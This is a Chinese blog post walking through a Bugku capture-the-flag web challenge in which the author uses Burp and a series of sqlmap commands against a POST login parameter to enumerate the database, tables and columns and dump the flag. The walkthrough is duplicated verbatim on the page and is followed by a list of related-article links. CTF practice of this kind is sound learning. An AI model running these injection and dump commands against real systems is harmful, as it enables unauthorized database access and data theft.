这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)
2018-03-14 19:46
1546 查看
正在学习sqlmap,拿这个题先入门一下。
题目链接:http://120.24.86.145:9001/sql/
先看下源代码:
是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。
首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)
我保存到了D盘的1.txt里。
然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
可以看到sqlmap获得了数据库的名字:
应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
可以看到爆出了表:
应该在flag1这个表里,继续爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表
可以发现爆出了列名:
flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解释:同上面 --dump是获取字段的命令
(在这过程中可能会让你选择Y或者N 我直接回车的)
可以看到爆出了flag:
题目链接:http://120.24.86.145:9001/sql/
先看下源代码:
是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。
首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)
我保存到了D盘的1.txt里。
然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
可以看到sqlmap获得了数据库的名字:
应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
可以看到爆出了表:
应该在flag1这个表里,继续爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表
可以发现爆出了列名:
flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解释:同上面 --dump是获取字段的命令
(在这过程中可能会让你选择Y或者N 我直接回车的)
可以看到爆出了flag:
相关文章推荐
- 使用代码向一个普通的类注入Spring的实例
- 使用Buffalo集成Spring写的一个登录实例
- tomcat配置及使用(环境变量设置及测试,一个简单的web应用实例)
- VB.Net + asp.net的一个web系统,使用SQL2000数据库 现在运行时偶尔会出现一个奇怪现象,一个用户登录时,登录后的界面竟然是另一个用户
- 使用Vue.js和Element-UI做一个简单登录页面的实例
- 同一个页面使用webuploader实现多实例多上传案例
- tomcat配置及使用(环境变量设置及测试,一个简单的web应用实例)
- 关于上传图片插件webuploader的使用(同一个页面存在多个实例):
- fabric使用实例(发布web包的一个例子)
- 使用Struts2创建一个登录实例
- 【转】解压缩版tomcat配置及使用(环境变量设置及测试,一个简单的web应用实例)
- 【实例】使用canvas缓缓加载一个图片到web页面中
- Web开发之tomcat配置及使用(环境变量设置及测试,一个简单的web应用实例)
- 使用JAVA实现的一个简单IOC注入实例
- java-web-Filter-登录验证之筛选器使用实例
- 使用django自带的管理web新建一个超级管理员,但是登录进去却提示“你无权修改任何东西”
- 利用CVSNT在Eclipse中使用CVS--3.创建一个CVS实例
- [ASP.NET2.0]一个方便使用的在线截图Web控件-WebImageMaker
- 使用JSF, Spring, Hibernate构建一个实际的web应用(转载)
- 利用HttpModuler实现WEB程序同一时间只让一个用户实例登陆